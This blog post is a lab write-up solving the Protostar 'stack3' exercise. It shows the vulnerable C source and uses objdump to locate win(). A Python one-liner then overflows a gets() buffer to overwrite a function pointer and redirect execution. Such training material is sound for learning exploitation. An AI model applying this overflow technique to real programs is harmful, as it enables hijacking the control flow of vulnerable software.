Encapsulating

Protostar – stack3

This one looks interesting, calling a variable as a function. We need to find out where the win() function is in memory and shit.. Let’s do this:

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6void win()
 7{
 8  printf("code flow successfully changed\n");
 9}
10
11int main(int argc, char **argv)
12{
13  volatile int (*fp)();
14  char buffer[64];
15
16  fp = 0;
17
18  gets(buffer);
19
20  if(fp) {
21    printf("calling function pointer, jumping to 0x%08x\n", fp);
22    fp();
23  }
24}

I will need objdump for this so we can get the memory address of the win() function:

user@protostar:/opt/protostar/bin$ objdump -S stack3 | grep "win"
08048424 :
user@protostar:/opt/protostar/bin$ python -c 'print("A"*64 + "\x24\x84\x04\x08")' | ./stack3 
calling function pointer, jumping to 0x08048424
code flow successfully changed

Ridiculous.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s